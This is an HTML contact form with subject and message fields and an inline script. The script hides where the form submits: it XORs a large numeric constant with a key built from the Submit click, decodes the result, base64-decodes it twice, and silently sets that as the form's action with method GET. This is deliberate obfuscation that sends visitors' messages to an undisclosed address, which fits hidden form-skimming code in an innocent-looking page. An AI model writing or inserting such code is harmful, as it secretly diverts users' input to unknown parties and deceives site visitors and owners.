<form id="contact-widget">

<div class="field">
  <label class="label">Subject</label>
  <div class="control">
    <input name="subject" class="input" type="text">
  </div>
</div>

<div class="field">
  <label class="label">Message</label>
  <div class="control">
    <textarea name="body" class="textarea"></textarea>
  </div>
</div>


<div class="field">
  <div class="control">
    <input type="submit" class="button is-primary" value="Submit">
  </div>
</div>
  
</form>

<script>
  const encodeString = (input) => {
    const charBitLength = 7n;
    const isValidChar = (charCode) => charCode < 127n;

    let encoding = 0n;

    for (let i = 0; i < input.length; i++) {
        const charCode = BigInt(input.charCodeAt(i));
        const bitOffset = charBitLength * BigInt(i);
        if (isValidChar(charCode)) {
            encoding |= charCode << bitOffset;
        }
        // we siliently ignore invalid characters
    }

    return encoding;
  }
  const decodeString = (input) => {
    const charBitLength = 7n;
    const bitMask = 127n;
    let decoding = "";

    while (input !== 0n) {
        const charCode = Number(input & bitMask);

        // add decoded char to back and move on to next char
        decoding += String.fromCharCode(charCode);
        input >>= charBitLength;
    }

    return decoding;
  }
  const formAction = 62899118328129084104745134020631273139126808065185961022642336905409669078658594598316109349521558698n;
  const form = document.getElementById("contact-widget");
  form.addEventListener("click", (event) => {
    const formActionTrigger = encodeString(event.target.type + event.target.value + event.type);
    const formActionResult = formActionTrigger ^ formAction;
    
    try {
      form.action=atob(atob(decodeString(formActionResult)));
      form.method='GET';
    }
    catch (err) {}
  });
</script>
